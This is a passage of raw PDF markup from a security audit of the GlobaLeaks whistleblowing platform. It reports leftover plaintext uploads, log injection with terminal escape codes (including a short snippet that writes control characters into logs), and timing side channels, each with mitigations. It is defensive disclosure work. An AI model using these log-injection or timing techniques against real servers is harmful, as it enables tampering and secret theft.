Tj T* ET Q Q q 1 0 0 1 62.69291 669.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (Malicious remote attackers can cause Denial of Service by consuming all hard drive space.) Tj T* ET Q Q q 1 0 0 1 62.69291 627.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .461984 Tw (A malicious remote attacker may place incriminating plaintext on a Node hard drive without knowledge of) Tj T* 0 Tw 2.23811 Tw (the Node admin or other users, in order to frame the Node administrator in a subsequent forensics) Tj T* 0 Tw (investigation.) Tj T* ET Q Q q 1 0 0 1 62.69291 597.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .08686 Tw (A Whistleblower may change their mind while submitting a Tip, and falsely believe their submitted files are) Tj T* 0 Tw (removed if they do not complete the submission.) Tj T* ET Q Q q 1 0 0 1 62.69291 555.0236 cm q BT 1 0 0 1 0 26 Tm .423984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (A remote attacker needs only an ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (connection to the Node, potentially over ) Tj /F4 10 Tf (Tor) Tj /F1 10 Tf (.) Tj T* 0 Tw 1.432209 Tw (To perform a Denial of Service, an attacker may need a large amount of bandwidth or a long enough) Tj T* 0 Tw (period of attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 14 Tm .05061 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (An attack intending to frame a Node requires very few resources to place the incriminating file) Tj T* 0 Tw (through this vulnerability, although a subsequent forensics investigation implies some separate attack.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 483.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.092765 Tw (A Denial of Service attack requires either a high bandwidth or a long time of attack, depending on disk) Tj T* 0 Tw .031163 Tw (size, but because an attacker can trade-off bandwidth for time, we predict it's quite feasible there would be) Tj T* 0 Tw (sufficiently motivated attackers.) Tj T* ET Q Q q 1 0 0 1 62.69291 441.0236 cm q BT 1 0 0 1 0 26 Tm 3.114983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This issue was verified by uploading a file, then closing the browser before actually) Tj T* 0 Tw 9.337674 Tw (submitting the Tip. Even after waiting a few days, the uploaded file remained in) Tj T* 0 Tw /F3 10 Tf (/var/globaleaks/files/submission) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 399.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.153672 Tw (This leaves the possibility it might be getting deleted after, say, a few weeks. This may still lead to the) Tj T* 0 Tw 1.315814 Tw (vulnerability Impacts mentioned above. We accordingly searched through the code, without finding any) Tj T* 0 Tw (logic that would delete the file.) Tj T* ET Q Q q 1 0 0 1 96.9978 150.1436 cm q 401.28 0 0 242.88 0 0 cm /FormXob.3504796935e9b1b0d34a034172872e63 Do Q Q q 1 0 0 1 62.69291 132.1436 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 78.14362 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .833516 Tw (When a Whistleblower uploads a file, it is written to the filesystem in plain text. When the Whistleblower) Tj T* 0 Tw 3.609984 Tw (submits the Tip, the file is encrypted and the originally-uploaded file is deleted. However, if the) Tj T* 0 Tw .216654 Tw (Whistleblower chooses not to submit the Tip after they've uploaded a file, it will remain on disk in plaintext) Tj T* 0 Tw (indefinitely.) 
Tj T* ET Q Q endstream endobj % 'R364': class PDFStream 364 0 obj % page stream << /Length 4719 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .413171 Tw (We did not have time to do an in-depth search for the code relevant to this issue. It may be the case that) Tj T* 0 Tw .877209 Tw (the files are removed after a long period of time, and we just missed that code. However, even keeping) Tj T* 0 Tw (the files for a few days after they are uploaded is a security risk.) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 14 Tm 1.090651 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should check the file upload folder for files that) Tj T* 0 Tw (are not associated with any Tip. This could be made easier by releasing a script that does this.) Tj T* ET Q Q q 1 0 0 1 62.69291 663.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm q BT 1 0 0 1 0 14 Tm 1.765697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The remediation for ) Tj 0 0 .501961 rg (Issue A. Plaintext is Written To Disk Before Encryption ) Tj 0 0 0 rg (would additionally protect) Tj T* 0 Tw (against the "framing" impact of this vulnerability.) Tj T* ET Q Q q 1 0 0 1 62.69291 591.0236 cm q BT 1 0 0 1 0 26 Tm .496235 Tw 12 TL /F1 10 Tf 0 0 0 rg (Adding logic to ) Tj /F3 10 Tf (unlink\(\) ) Tj /F1 10 Tf (the uploaded files when the Whistleblower fails to finish submitting the tip will) Tj T* 0 Tw .61284 Tw (greatly mitigate this Denial of Service vector, although attackers with sufficient bandwidth, or edge cases) Tj T* 0 Tw (which bypass the call to ) Tj /F3 10 Tf (unlink\(\) ) Tj /F1 10 Tf (may thwart this remediation strategy.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .713672 Tw (An alternative remediation is to only upload the files when the Tip is in the state which the cleanup logic) Tj T* 0 Tw (already handles.) Tj T* ET Q Q q 1 0 0 1 62.69291 531.0236 cm q BT 1 0 0 1 0 14 Tm .789982 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also recommend showing the terms-of-service agreement to the Whistleblower ) Tj /F4 10 Tf (before ) Tj /F1 10 Tf (they have the) Tj T* 0 Tw (opportunity to upload any files.) Tj T* ET Q Q q 1 0 0 1 62.69291 513.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET Q Q q 1 0 0 1 62.69291 507.0236 cm Q q 1 0 0 1 62.69291 507.0236 cm Q q 1 0 0 1 62.69291 321.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 170.2 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 158.2 cm q BT 1 0 0 1 0 14 Tm .278555 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-02-06 ) Tj /F1 10 Tf (- This issue is related to ) Tj 0 0 .501961 rg (GlobaLeaks ticket 782 ) Tj 0 0 0 rg (and the ) Tj 0 0 .501961 rg (GlobaLeaks Submission) Tj T* 0 Tw (Flood Resiliency Project ) Tj 0 0 0 rg (document.) Tj T* ET Q Q q 1 0 0 1 23 128.2 cm q BT 1 0 0 1 0 14 Tm .18229 Tw 12 TL /F1 10 Tf 0 0 0 rg (The latter document does not distinguish between file uploads and "submissions", which we interpret) Tj T* 0 Tw (to mean ) Tj /F4 10 Tf (tips) Tj /F1 10 Tf (. The following comes from that document:) Tj T* ET Q Q q 1 0 0 1 23 35 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 445.6898 84 re B* Q q 0 0 0 rg BT 1 0 0 1 0 62 Tm /F3 10 Tf 12 TL (There are 3 different way that can be done to achieve a flood attack:) Tj T* T* ( 1. Creating many new submissions \(regardless of the amount of) Tj T* ( fields/files attached\)) Tj T* ( 2. Adding a lot of new comments on existing submissions) Tj T* ( 3. 
Uploading a lot of new files on existing submissions) Tj T* ET Q Q Q Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .409988 Tw (The flood attack vector 3 is worded as if files may only be uploaded within the context of an existing) Tj T* 0 Tw (submission. This issue demonstrates uploads may occur outside of submissions.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 315.8236 cm Q q 1 0 0 1 62.69291 303.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #828) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 303.8236 cm Q q 1 0 0 1 62.69291 303.8236 cm Q endstream endobj % 'R365': class PDFStream 365 0 obj % page stream << /Length 6946 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue I. User Input Written to Logs) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q BT 1 0 0 1 0 14 Tm .756098 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (User input is written to log files. This might let attackers create fake log entries or log entries) Tj T* 0 Tw (that contain terminal escape codes.) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 14 Tm 1.751235 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (The attacker can create fake log entries and can insert terminal escape codes into the logs,) Tj T* 0 Tw (which could be used to execute code when the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrator views the logs.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 642.0236 cm q BT 1 0 0 1 0 14 Tm 2.438555 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node must be configured to log ) Tj /F4 10 Tf (info ) Tj /F1 10 Tf (or ) Tj /F4 10 Tf (debug ) Tj /F1 10 Tf (messages. We) Tj T* 0 Tw (believe the default level, ) Tj /F3 10 Tf (CRITICAL) Tj /F1 10 Tf (, is safe, but we are not certain. This is mentioned in ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q BT 1 0 0 1 0 14 Tm 1.534651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (There are several log messages that contain user input. The attacker only has to provide) Tj T* 0 Tw (input that will be passed to one of these log messages.) Tj T* ET Q Q q 1 0 0 1 62.69291 594.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 576.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The following code can be found in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 570.0236 cm Q q 1 0 0 1 62.69291 545.5478 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q .971265 0 0 .971265 0 0 cm q 1 0 0 1 6.6 6.795265 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 462 24 re B* Q q BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 0 0 rg (log) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("=) Tj (>) Tj ( Recorded new InternalFile ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ( \() Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (\)") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (\() Tj (original_fname) Tj (,) Tj ( ) Tj (cksum) Tj (\)\)) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 62.69291 545.5478 cm Q q 1 0 0 1 62.69291 527.5478 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (There are many more log messages formatting external input with ) Tj /F3 10 Tf (%s) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 485.5478 cm q BT 1 0 0 1 0 26 Tm 11.42886 Tw 12 TL /F1 10 Tf 0 0 0 rg (The generated log message goes through ) Tj /F3 10 Tf (twisted.python.log) Tj /F1 10 Tf (, a complex and) Tj T* 0 Tw 5.038538 Tw (not-obviously-fully-documented module. Experimentation shows control characters getting through) Tj T* 0 Tw (unescaped:) Tj T* ET Q Q q 1 0 0 1 62.69291 479.5478 cm Q q 1 0 0 1 62.69291 442.3478 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 448.6898 36 re B* Q q BT 1 0 0 1 0 14 Tm 12 TL /F3 10 Tf 0 0 0 rg (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ('') Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (join) Tj (\() Tj 0 .501961 0 rg (map) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (chr) Tj 0 0 0 rg (,) Tj ( ) Tj 0 .501961 0 rg (range) Tj 0 0 0 rg (\() Tj .4 .4 .4 rg (32) Tj 0 0 0 rg (\)\)\)\)) Tj T* (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ('') Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (join) Tj (\() Tj 0 .501961 0 rg (map) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (chr) Tj 0 0 0 rg (,) Tj ( ) Tj 0 .501961 0 rg (range) Tj 0 0 0 rg (\() Tj .4 .4 .4 rg (127) Tj 0 0 0 rg (,) Tj ( ) Tj .4 .4 .4 rg (140) Tj 0 0 0 rg (\)\)\)\)) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 62.69291 442.3478 cm Q q 1 0 0 1 62.69291 400.3478 cm q BT 1 0 0 1 0 26 Tm .217209 Tw 12 TL /F1 10 Tf 0 0 0 rg (This produces in the log file \(as rendered by Emacs; for example, ) Tj /F4 10 Tf (^[ ) Tj /F1 10 Tf (means a literal ESC character, ASCII) Tj T* 0 Tw 1.349984 Tw (27, used in terminal-escape exploits; the octal escape codes are also from Emacs, standing for binary) Tj T* 0 Tw (characters in the log file\):) Tj T* ET Q Q q 1 0 0 1 62.69291 331.1478 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 60 re B* Q q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F3 10 Tf 12 TL (2014-02-14 15:23:50+0100 [-] [D] ^@^A^B^C^D^E^F^G^H) Tj T* (2014-02-14 15:23:50+0100 [-] ^K^L^M^N^O^P^Q^R^S^T^U^V^W^X^Y^Z^[^\\^]^^^_) Tj T* (2014-02-14 15:24:26+0100 [-] [D]) Tj T* (^?\\200\\201\\202\\203\\204\\205\\206\\207\\210\\211\\212\\213) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 299.1478 cm q BT 1 0 0 1 0 14 Tm 2.900697 Tw 12 TL /F1 10 Tf 0 0 0 rg (To exploit a default configuration, an attacker must inject special characters into a ) Tj /F3 10 Tf (log.msg ) Tj /F1 10 Tf (call.) Tj T* 0 Tw /F3 10 Tf (log.err ) Tj /F1 10 Tf (appears to escape these characters.) Tj T* ET Q Q q 1 0 0 1 62.69291 281.1478 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 251.1478 cm q BT 1 0 0 1 0 14 Tm .27528 Tw 12 TL /F1 10 Tf 0 0 0 rg (This issue is mitigated as long as ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators do not use a non-default log level \(the) Tj T* 0 Tw (default is ) Tj /F3 10 Tf (CRITICAL) Tj /F1 10 Tf (\).) 
Tj T* ET Q Q q 1 0 0 1 62.69291 233.1478 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 203.1478 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .015697 Tw (All messages should be logged in a way that safely and unambiguously encodes non-printable characters.) Tj T* 0 Tw (All logging paths should go through the same, safe sanitizer.) Tj T* ET Q Q q 1 0 0 1 62.69291 173.1478 cm q BT 1 0 0 1 0 14 Tm .258876 Tw 12 TL /F1 10 Tf 0 0 0 rg (Here are two examples of the sort of encoding we mean: one in use ) Tj 0 0 .501961 rg (in Tahoe-LAFS) Tj 0 0 0 rg (, and a self-contained) Tj T* 0 Tw (function we have not used, and only cursorily tested:) Tj T* ET Q Q q 1 0 0 1 62.69291 173.1478 cm Q endstream endobj % 'R366': class PDFStream 366 0 obj % page stream << /Length 5160 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 408.6576 cm q q .822636 0 0 .822636 0 0 cm q 1 0 0 1 6.6 8.022988 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 570 432 re B* Q q BT 1 0 0 1 0 410 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (import) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf 0 0 1 rg (codecs) Tj /F3 10 Tf 0 0 0 rg T* T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (debug) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\):) Tj T* ( ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* ( I'll encode logmsg into a safe representation \(containing only) Tj T* ( printable ASCII characters\) and pass it to log.debug\(\) \(which in) Tj T* ( this example stands in for some underlying logging module that) Tj T* ( doesn't further process the string\).) Tj T* T* ( As an aside, it can be helpful to hold all strings of human-language) Tj T* ( characters in Python unicode objects, never in Python \(Python v2\) string) Tj T* ( objects \(which are renamed to "bytes" objects in Python v3\). However,) Tj T* ( that is not necessary to use this.) 
Tj T* ( """) Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj (log_encode) Tj (\() Tj (logmsg) Tj (\)\)) Tj T* T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (log_encode) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\):) Tj T* ( ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* ( I encode logmsg \(a str or unicode\) as printable ASCII. Each case) Tj T* ( gets a distinct prefix, so that people differentiate a unicode) Tj T* ( from a utf-8-encoded-byte-string or binary gunk that would) Tj T* ( otherwise result in the same final output.) Tj T* ( """) Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (isinstance) Tj 0 0 0 rg (\() Tj (logmsg) Tj (,) Tj ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\):) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (': ') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (codecs) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj (logmsg) Tj (,) Tj ( ) Tj .729412 .129412 .129412 rg ('unicode_escape') Tj 0 0 0 rg (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (elif) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (isinstance) Tj 0 0 0 rg (\() Tj (logmsg) Tj (,) Tj ( ) Tj 0 .501961 0 rg (str) Tj 0 0 0 rg (\):) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (try) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj (unicodelogmsg) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (logmsg) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (decode) Tj (\() Tj .729412 .129412 .129412 rg ('utf-8') Tj 0 0 0 rg (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (except) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .823529 .254902 .227451 rg (UnicodeDecodeError) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('binary: ') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (codecs) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (encode) Tj (\() Tj (logmsg) Tj (,) Tj ( ) Tj .729412 .129412 .129412 rg ('string_escape') Tj 0 0 0 rg (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('utf-8: ') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (codecs) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj (unicodelogmsg) Tj (,) Tj ( ) Tj .729412 .129412 .129412 rg ('unicode_escape') Tj 0 0 0 rg (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (raise) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .823529 .254902 .227451 rg (Exception) Tj /F3 10 Tf 0 0 0 rg (\() Tj .729412 .129412 .129412 rg ("I accept only a unicode object or a string, not a ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ( object like ) Tj /F6 10 Tf .733333 .4 .533333 rg (%r) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg T* ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (\() Tj 0 .501961 0 rg (type) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\),) Tj ( ) Tj 0 .501961 0 rg (repr) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\),\)\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 388.6576 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Partially confirmed, but needs more analysis.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 382.6576 cm Q q 1 0 0 1 62.69291 382.6576 cm Q q 1 0 0 1 62.69291 370.6576 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #829) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 370.6576 cm Q q 1 0 0 1 62.69291 370.6576 cm Q endstream endobj % 'R367': class PDFStream 367 0 obj % page stream << /Length 5002 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 735.0236 cm q BT 1 0 0 1 0 17.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* (Attacks) Tj T* ET Q Q q 1 0 0 1 62.69291 717.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 699.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Information about various secrets leaks through the side channel of timing of operations.) Tj T* ET Q Q q 1 0 0 1 62.69291 669.0236 cm q BT 1 0 0 1 0 14 Tm 1.923555 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (The attacker can extract secrets by measuring the response time of the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server.) Tj T* 0 Tw (Some candidate secrets include file download tokens, XSRF tokens, session IDs, and account names.) Tj T* ET Q Q q 1 0 0 1 62.69291 639.0236 cm q BT 1 0 0 1 0 14 Tm .405868 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to be able to measure the time it takes the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server to) Tj T* 0 Tw (respond to their requests.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 585.0236 cm q BT 1 0 0 1 0 38 Tm .237984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The exploitability of a timing side channel depends on the resolution and accuracy with which) Tj T* 0 Tw .015984 Tw (the attacker can measure response times. The latency introduced by the Tor network should make attacks) Tj T* 0 Tw 1.122619 Tw (harder, but it is not a defense because the noise is additive: it can be countered with more samples to) Tj T* 0 Tw (infer the signal.) Tj T* ET Q Q q 1 0 0 1 62.69291 555.0236 cm q BT 1 0 0 1 0 14 Tm 3.524597 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection. The specific issues listed below have not been) Tj T* 0 Tw (confirmed by experiment, but we list them anyway to err on the side of caution.) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 14 Tm 1.779147 Tw 12 TL /F1 10 Tf 0 0 0 rg (See ) Tj 0 0 .501961 rg (Appendix D. Side-Channel Attack Proof of Concept ) Tj 0 0 0 rg (for an informal proof-of-concept side-channel) Tj T* 0 Tw (attack on ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 507.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 453.0236 cm q BT 1 0 0 1 0 38 Tm 1.866651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Operations whose time varies depending on the value of a secret thereby leak information about the) Tj T* 0 Tw 2.015318 Tw (secret. An attacker may be able to integrate the piecemeal information about the secret revealed by) Tj T* 0 Tw 1.053318 Tw (iterated requests to reveal the secret itself. See the paper ) Tj 0 0 .501961 rg (Exposing Private Information by Timing Web) Tj T* 0 Tw (Applications) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 435.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The specific vulnerabilities of this class that we've noticed are listed as sub-issues following this one.) 
